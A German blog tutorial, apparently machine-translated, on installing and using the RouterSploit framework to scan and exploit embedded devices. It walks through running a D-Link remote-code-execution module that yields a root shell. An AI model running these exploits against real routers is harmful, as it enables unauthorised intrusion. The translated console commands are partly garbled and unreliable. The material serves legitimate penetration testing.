Zuhause » Linux-tools » RouterSploit – Exploitation Framework Vollständiges Tutorial [2020]

RouterSploit – Exploitation Framework Vollständiges Tutorial [2020]

durch die Suyash
routersploit

RouterSploit ist ein erstaunliches Exploitation-Framework, das speziell für eingebettete Geräte entwickelt wurde.

Dieses Tool kann von Pentester verwendet werden, um die Sicherheit von Kameras und Routern zu scannen.

RouterSploit-Highlights:

  • In Python codiert.
  • Befehlszeilenschnittstelle.
  • Docker-Unterstützung.
  • Modulare Werkzeuge.

Unterstütztes Betriebssystem:

  1. Mac OS.
  2. Linux.
  3. Android Telefon.
  4. Windows.

RouterSploit installieren:

Bedarf:

  • Zukunft
  • Anfragen
  • Paramiko
  • pysnmp
  • pycrypto

Optional:

  • bluepy – Bluetooth niedrige Energie

Installation unter Kali Linux:

Befolgen Sie die folgenden Befehle:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy-Unterstützung:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation in Ubuntu:

Befolgen Sie die folgenden Befehle:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy-Unterstützung:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation unter MacOS:

Befolgen Sie die folgenden Befehle:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Installation auf Docker:

Befolgen Sie die folgenden Befehle:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

So aktualisieren Sie RouterSploit?

Sie müssen RouterSploit häufig aktualisieren, um Unannehmlichkeiten zu vermeiden.

Neue Module werden fast täglich ausgeliefert.

cd routersploit
git pull

Verwendung von RouterSploit?

Verwendung

root @ kalidev:~ / git / routersploit # ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_ / / ___ _ _| |_ ___ _ __  `-. _ __ | | ___ _| |_
 |    // _ \| | | | __ / _ \ '__|`-. \ '_ \| |/ _ \| | __ __|
 | |\ \ (_) | |_| | ||  __ / |  /\__ / / |_) | | (_) | | |_
  _| \_  ___ /  __,_|\__  ___|_|  \____ /| .__ /|_|\___ /|_|\__ __|
                                     | |
       Exploitation Framework für    |_|   von Threat9
            Eingebettete Geräte
  
 Code Name   : Ich wusste dass du ein Problem sein würdest
 Ausführung    : 3.3.0
 Startseite   : https://www.threat9.com/ - @ Threatnine
 Mach mit bei Slack : routersploit.slack.com

 Nehmen Sie am Threat9 Beta-Programm teil - https://www.threat9.com/

 Exploits: 128 Scanner: 4 Creds: 165 Generisch: 4 Nutzlasten: 32 Encoder: 6

rsf >

Exploits:

Um die Ausbeutung durchzuführen, Wählen Sie einfach das Modul aus und legen Sie das Ziel fest:

rsf > Exploits verwenden /
Exploits / 2wire / Exploits / Asmax / Exploits / Asus / Exploits / Cisco / Exploits / Dlink / Exploits / Fortinet / Exploits / Wacholder / Exploits / Linksys / Exploits / Multi / Exploits / Netgear /
rsf > Verwenden Sie Exploits / dlink / dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Verwenden Sie zum Abschluss die Tabulatortaste.

Optionen anzeigen, Artshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > Optionen anzeigen

Zieloptionen:


   Name Aktuelle Einstellungen Beschreibung                                
   ----       ----------------     -----------                                
   Ziel Zieladresse, z. http://192.168.1.1     
   Hafen       80                   Zielport

Verwendenrun oderexploit Befehl zum Ausnutzen des Ziels:

rsf (D-LINK DIR-300 & DIR-600 RCE) > Lauf
[+] Ziel ist anfällig
[*] Befehlsschleife aufrufen ...
cmd > Wer bin ich
Wurzel

Optionen festlegen:

rsf (D-LINK DIR-300 & DIR-600 RCE) > Ziel setzen http://192.168.1.1 [+] {'Ziel': 'http://192.168.1.1'}

Es ist möglich zu überprüfen, ob das Ziel für einen bestimmten Exploit anfällig ist:

rsf (D-LINK DIR-300 & DIR-600 RCE) > prüfen
[+] Ziel ist anfällig

Laufshow info um Informationen über den Exploit anzuzeigen.

Scannen nach gefährdeten Zielen:

Mithilfe von Scannern können Sie schnell überprüfen, ob das Ziel für Exploits anfällig ist.

Verwenden Sie dieselben Befehle, um Optionen anzuzeigen / festzulegen, und auch zu rennen.

rsf (D-Link-Scanner) > Lauf
[+] Exploits / dlink / dwr_932_info_disclosure ist anfällig
[-] Exploits / dlink / dir_300_320_615_auth_bypass ist nicht anfällig
[-] Exploits / dlink / dsl_2750b_info_disclosure ist nicht anfällig
[-] Exploits / dlink / dns_320l_327l_rce ist nicht anfällig
[-] Exploits / dlink / dir_645_password_disclosure ist nicht anfällig
[-] Exploits / dlink / dir_300_600_615_info_disclosure ist nicht anfällig
[-] Exploits / dlink / dir_300_600_rce ist nicht anfällig

[+] Gerät ist anfällig!
- Exploits / dlink / dwr_932_info_disclosure

Offizieller RouterSploit

Lesen Sie auch: 1337x-Proxy

Letzte Worte:

RouterSploit ist ein erstaunliches Werkzeug zu verwenden.

Wenn Sie Probleme mit dem RouterSploit. Stellen Sie sicher, dass Sie unten einen Kommentar abgeben. Unser Team CSHAWK wird sich so schnell wie möglich mit Ihnen in Verbindung setzen.

Hinterlasse einen Kommentar